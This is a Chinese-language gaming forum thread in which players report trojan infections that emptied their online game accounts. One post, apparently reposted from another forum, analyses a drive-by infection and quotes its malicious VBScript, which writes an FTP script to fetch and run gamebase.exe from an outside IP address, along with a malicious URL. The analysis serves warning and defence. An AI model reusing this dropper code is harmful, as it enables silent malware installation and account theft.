鐵之狂傲

 取回密碼
 註冊
搜尋
樓主: salanieyou
列印 上一主題 下一主題

木馬

[複製連結] 檢視: 1870|回覆: 22

回覆: 木馬

昨天一點多玩無介突然全身沒裝備...
在家玩也沒用外掛也被清空....
有何天理呀..
 

回覆 使用道具 檢舉

回覆: 木馬

謝謝
你真屌
我看你可以請武大大幫你開個專區(名稱:木馬終結)
 
[CODE] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾是黑暗[/color][/url][color=red]:大笑: [/color][/size] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾所做之事是破壞跟毀滅[/color][/url][color=red]:邪惡: [/color][/size] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾所唱之歌是痛苦之歌[/color][/url][color=red]:邪惡: [/color][/size] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾所前往之處是虛無之地[/color][/url][color=red]:邪惡: [/color][/size] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾之志願是絕對的破壞[/color][/url][color=red]:邪惡: [/color][/size] [color=red][/CODE][/color]

回覆 使用道具 檢舉

回覆: 木馬

[QUOTE=salanieyou]裡面沒有清SmcSVR.exe這隻的教學@@[/QUOTE]


仔細想想.我回覆好像回錯了說@@""...綠色的字是防毒軟體的程式.並不是木馬的檔案.所以請

找到你有的防毒軟體.依照她的說明步驟來做吧!!!
 

如果有回鍋或不當發言的情形.請轉告.魚頭儘快修正或刪除.謝謝~

蒐集鐵傲眾名單中!願意給Msn~都可以傳悄悄話喔!

笨魚頭の『 新BLOG 』 『 散文小品 』

回覆 使用道具 檢舉

回覆: 木馬

廢話補充在一篇~"~

最近木馬橫行,我的朋友已經兩個人中獎被盜了;由於工作是MIS自己也粉好奇。於是,請朋友把檔案傳給我;並且上網爬文實測出下列結果;供大家參考一下。

大致上是上過某個被入侵的網站,而那個網頁被植入一段程式,不管是下載檔案或是點某個超連結後,那個超連結會執行一段小程式,FTP至大陸網站下載gamebase.exe的檔案到電腦的C:\;這個時候還不會有事。

然後,會自動執行gamebase.exe 在C:\windows的目錄下產生Smcsvr.exe 的檔案,並且更改機碼,就算是重新開機也能自動執行,再來當然就是等受害者上當;,再把竊取的資料傳回去。
測試過程如下:我的電腦是Windows Xp+IE6.01Sp1;所有修正程式都修到最新的。公司的防毒軟體是 Officescan5.5,病毒碼943,當IE 連到"http://zhu.7xi.org/gamebase/ng.test"時,會出現開啟或是儲存的選項(像是下載東西)。***這段過程如果植入網頁執行,一般人根本不會察覺。

選擇儲存的話會下載ng.hta 的檔案;沒事,安全 ^^Y。
選擇開啟的話;恭喜!中標了! > <" 。在C:\會產生gamebase.exe 的檔案,手動執行他就會"進化"出 smcsvr.exe 的檔案並且更改機碼。
當時IE的安全性設定是預設(一般人大概不會改,甚至連改它做啥都不知道吧);而防毒軟體完全沒反映,難怪一堆人會中獎。後來去下載江民2004來裝,一連到上面那個網頁就出警訊了,請朋友幫忙測,他的NORTON2004 也說有擋到。再來是關掉江民防毒軟體,執行smcsvr.exe,讓它長駐執行;然後連到SYMANTEC 去做線上掃毒也有掃到;去趨勢下載 tsc.exe 掃木馬專用的,居然沒
掃到 @@"。

PS:"http://zhu.7xi.org/gamebase/ng.test" 的連結來自某L牌討論區,藍瞳 大大所提出的。江民防毒軟體是參考雄x網頁所寫的資料來測試(不要誤會,不是宣揚外掛,爬文找資料而已,善用google可以找到粉多東西的)。病毒樣本及網址我已經傳給在趨勢工作的朋友了,他說傳去菲律賓了,希望趕快出新病毒碼,畢竟我是趨勢的愛用者。那個網址的惡意執行碼如下,供大家參考

et fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("163.txt",True)
t.WriteLine("open 61.163.238.51")→*ftp連到這個地方*
t.WriteLine("nh")**ftp 的 user name**
t.WriteLine("nh")**ftp 的 password**
t.WriteLine("lcd c:\")
t.WriteLine("bin")
t.WriteLine("get gamebase.exe")**下載gamebase.exe**
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:163.txt",0,true
wsh.Run "c:\gamebase.exe" **執行gamebase.exe**
fs.DeleteFile "163.txt",true
window.close

寫到這裡就有氣!看到那些說明,還會幫客戶找為啥會中毒,以及解決方法。人家的外掛都會搶登將對方踢下線,而守法玩家中木馬被盜者只能眼睜睜看自己被擠出去,花了3、4分鐘才能連到連線密碼更改網頁,早就被清光了......

至於解決方法,之前粉多文章討論過ㄌ就不再多說了,目前我保護自己的方式是玩遊戲前後,都會開啟工作管理員看有沒有不該有的程式在執行,畢竟當新的木馬出來後,現有的防護措施不見得擋的到,自求多福嚕。

轉載至巴哈姆特
 

回覆 使用道具 檢舉

無名的勇者

天堂版甜不辣帝王

回覆: 木馬

感謝熱心發帖^^
也感謝您的教學
聲望等能補再補吧XD
 
年復一年此畫中,桃花倒影相映紅,
畫中倒影何處去,桃花依舊笑春風。

回覆 使用道具 檢舉

回覆: 木馬

[QUOTE=salanieyou]就在剛剛我上限的時候裝備都不見了
對方只拿裝備...

能問一下各位...我要怎摩掃看看有沒有木馬><....

我沒有用雄霸...
沒用任何變身檔...[/QUOTE]
要找木馬非常簡單
首先~
妳先把全身最貴重的物品放在某一個帳號
隻後看看會不會被盜就知道有沒有木馬了
我都是這樣測試的喔
 

回覆 使用道具 檢舉

回覆: 木馬

[QUOTE=追尋夢想]要找木馬非常簡單
首先~
妳先把全身最貴重的物品放在某一個帳號
隻後看看會不會被盜就知道有沒有木馬了
我都是這樣測試的喔[/QUOTE]


雖然她已經被禁...不過還是不免抱怨一下.這種傢伙有沒有辦法讓她消失=  = ""

問問AQ大大看看......
 

回覆 使用道具 檢舉

回覆: 木馬

[QUOTE=追尋夢想]要找木馬非常簡單
首先~
妳先把全身最貴重的物品放在某一個帳號
隻後看看會不會被盜就知道有沒有木馬了
我都是這樣測試的喔[/QUOTE]

追尋夢想請你不要那麼白木可不可以~還開一個帳號放在那裡面勒~我交你辣
妳懷疑你中木馬的話你把全部裝備都給我我幫我故辣~我一定會玩點點樂
 

回覆 使用道具 檢舉

回覆: 木馬

我家掃毒用熊貓  Panda  裡面好像沒有><"
 

回覆 使用道具 檢舉

回覆: 木馬

挖也是一開啟帳號就被清空ㄌ...
但是他怎ㄇ會連我要下限ㄉ時間都知道啦= =
我才離開1ㄍ多小時......
就被清空ㄌ....
基本上我是24小時都在ㄉ...= =
我也有掃過木馬....間諜程式也有用
可是就是被盜ㄌ...
吶ㄟ安捏..........
 
吃人鐵達尼

回覆 使用道具 檢舉

你需要登入後才可以回覆 登入 | 註冊

存檔|手機版|聯絡我們|新聞提供|鐵之狂傲

GMT+8, 24-12-27 13:08 , Processed in 0.021761 second(s), 15 queries , Gzip On.

回頂部